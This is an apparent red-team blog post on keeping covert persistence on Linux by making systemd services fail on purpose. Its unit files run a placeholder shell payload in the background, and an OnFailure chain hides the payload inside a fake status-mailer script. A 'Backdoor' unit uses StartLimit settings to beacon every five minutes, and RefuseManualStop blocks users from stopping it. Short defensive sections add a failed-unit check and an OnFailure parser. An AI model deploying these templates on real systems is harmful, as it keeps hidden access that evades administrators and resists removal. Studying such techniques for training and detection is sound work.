Controlled Failure to Maintain Persistence using Systemd

Quite some time ago I wrote a blog post about how to maintain persistence with systemd services. I largely used it as a simple and reliable method to maintain access to systems during red-teaming and competitions/events. However, over the years administrators have become more accustomed to systemd and how to work with its units. As a result, these simplistic systemd service backdoors are caught rather quickly. So instead I’ve been modifying more recognizable/expected systemd services for controlled failure to maintain persistence.

Why Controlled Failure to Maintain Persistence?

Long story short, it’s much harder to detect a service with a common name that isn’t actually running when someone looks at a list of running services. It is also possible to hide activities from logging and other monitoring tools. Finally, the StartLimit* options within a systemd unit, like a service, can be used to create an effective beacon.

Method A: Force the Service to Fail in the Background

In this method, we simply have the service execute and background a given command, then exit 1/false. The result is a failed start that effectively leaves the shell code running as a background process. Below is an example of a service that is very similar to the one in the last systemd blog post.

[Service]
Type=simple
ExecStart=python -c '<shell code>' &; exit 1
Restart=always
RestartSec=300

The benefit is pretty simple: the service won’t show up when currently running services are queried. However, information about the process and the command run will be within the service logs, which could lead to quick discovery if the logs and/or service errors are reviewed by an administrator. So overall, I find this method is good for training and competitions where we want individuals to find artifacts to act upon.

In order to watch for unit failures, make it a common practice to run a command like ‘systemctl list-units --failed’ to review what’s going on with the system.
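
That review can also be scripted so it runs on a schedule. The following is a minimal sketch, assuming the column layout printed by ‘systemctl list-units --failed --plain --no-legend’ (UNIT, LOAD, ACTIVE, SUB, then the description). The function names and the sample listing are hypothetical and only there for illustration.

```python
import subprocess


def failed_units(listing: str) -> list[str]:
    """Extract unit names from list-units output whose ACTIVE column is 'failed'."""
    units = []
    for line in listing.splitlines():
        fields = line.split()
        # Assumed columns: UNIT LOAD ACTIVE SUB DESCRIPTION...
        if len(fields) >= 4 and fields[2] == "failed":
            units.append(fields[0])
    return units


def query_failed_units() -> list[str]:
    """Ask systemctl for failed units on the local host (requires systemd)."""
    result = subprocess.run(
        ["systemctl", "list-units", "--failed", "--plain", "--no-legend"],
        capture_output=True,
        text=True,
        check=False,
    )
    return failed_units(result.stdout)


# Hypothetical sample output, used here instead of a live system.
SAMPLE = """\
nginx.service loaded failed failed A high performance web server
backup.timer  loaded failed failed Nightly backup
"""

print(failed_units(SAMPLE))
```

Comparing the result against a list of units that are expected to be present on the host is one way to notice a familiar-looking service that has no business being there.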

Method B: Expect Failure and Trigger an OnFailure Unit

This method utilizes a legitimate service unit file from a common program that isn’t actually installed. Since the service’s intended binaries and configuration files don’t exist, the service will fail to start. We can then use the OnFailure unit option to trigger another unit, similar to this systemd-unit-status-mailer example. The idea is that we can hide our activity within another unit and leverage controlled failure to maintain persistence. An example for this method consists of the following.

First, we can modify an existing unit, or copy a new one from a common package, and add the OnFailure option to trigger the secondary unit.

[Unit]
...
OnFailure=unit-status-mail@%n.service

Next, we can utilize a legitimate-looking secondary unit, like the common unit status mailer, to execute our shell code.

[Unit]
Description=Unit Status Mailer Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/unit-status-mail.sh %I "Hostname: %H" "Machine ID: %m" "Boot ID: %b"

Finally, we can add the shell code directly to the bash script run by the secondary service unit.

#!/bin/bash
MAILTO="root"
MAILFROM="unit-status-mailer"
UNIT=$1

EXTRA=""
for e in "${@:2}"; do
  EXTRA+="$e"$'\n'
done

UNITSTATUS=$(systemctl status "$UNIT")

sendmail $MAILTO <<EOF
From:$MAILFROM
To:$MAILTO
Subject:Status mail for unit: $UNIT

Status report for unit: $UNIT
$EXTRA

$UNITSTATUS
EOF
python -c "<shell code>"
echo -e "Status mail sent to: $MAILTO for unit: $UNIT"

The main benefit of this method is that the malicious process is nested within the execution of a secondary systemd unit, which only triggers on failure. The activity is attributed to the secondary unit rather than to the service that failed, so it is much less likely to stand out when someone reviews the logs of the primary unit.
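
For training exercises, it helps to show participants how to trace that chain from the other direction. The following is a minimal sketch that pulls the OnFailure targets out of a unit file's text so the secondary units and their scripts can be reviewed. It is a simple line-based reader, not a full implementation of the systemd unit file syntax (no line continuations, no drop-in directories), and the function name and sample unit are hypothetical.

```python
def on_failure_targets(unit_text: str) -> list[str]:
    """Return the units named by OnFailure= lines in the [Unit] section."""
    targets = []
    section = None
    for raw in unit_text.splitlines():
        line = raw.strip()
        # Skip blank lines and comments.
        if not line or line.startswith(("#", ";")):
            continue
        # Track which section we are in, e.g. [Unit] or [Service].
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        key, sep, value = line.partition("=")
        if sep and section == "Unit" and key.strip() == "OnFailure":
            # The value may hold several space-separated unit names.
            targets.extend(value.split())
    return targets


# Hypothetical unit text for illustration.
SAMPLE_UNIT = """\
[Unit]
Description=Example daemon
OnFailure=unit-status-mail@%n.service

[Service]
ExecStart=/usr/bin/example
"""

print(on_failure_targets(SAMPLE_UNIT))
```

Any unit returned here is worth opening, along with whatever script its ExecStart line points to.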

Leveraging Start Limits for Effective Beaconing

There are several options available to control how and when systemd will take action on a given unit. We can use the unit options StartLimitBurst and StartLimitIntervalSec alongside the standard service option RestartSec. When used in combination with controlled service failure, these create a timed gap between restart attempts for effective beaconing. Getting the timing right can be tricky, but a simple 5-minute beacon can be done like the following example.

[Unit]
Description=Backdoor
StartLimitBurst=12
StartLimitIntervalSec=3600

[Service]
Type=simple
ExecStart=python -c '<shell code>' &; exit 1
Restart=always
RestartSec=300
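
The arithmetic behind those values can be checked with a rough calculation. The following is a back-of-the-envelope sketch, assuming the service fails immediately so that start attempts are spaced RestartSec apart; it ignores the time the command takes to run and systemd's exact rate-limit accounting. The function names are hypothetical.

```python
def starts_per_interval(restart_sec: int, interval_sec: int) -> int:
    """Approximate number of start attempts that fit in one limit interval."""
    return interval_sec // restart_sec


def within_start_limit(restart_sec: int, burst: int, interval_sec: int) -> bool:
    """True if the restart cadence stays at or under StartLimitBurst."""
    return starts_per_interval(restart_sec, interval_sec) <= burst


# Values from the unit above: RestartSec=300, StartLimitBurst=12,
# StartLimitIntervalSec=3600.
print(starts_per_interval(300, 3600))     # 12
print(within_start_limit(300, 12, 3600))  # True
```

With a 300-second gap, roughly 12 attempts fit in the 3600-second interval, which matches the burst value of 12. A shorter RestartSec with the same limits would exceed the burst, and systemd would stop restarting the unit.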

The unit option ‘RefuseManualStop=True’, set in the [Unit] section, can be used to prevent users from manually stopping a given service unit.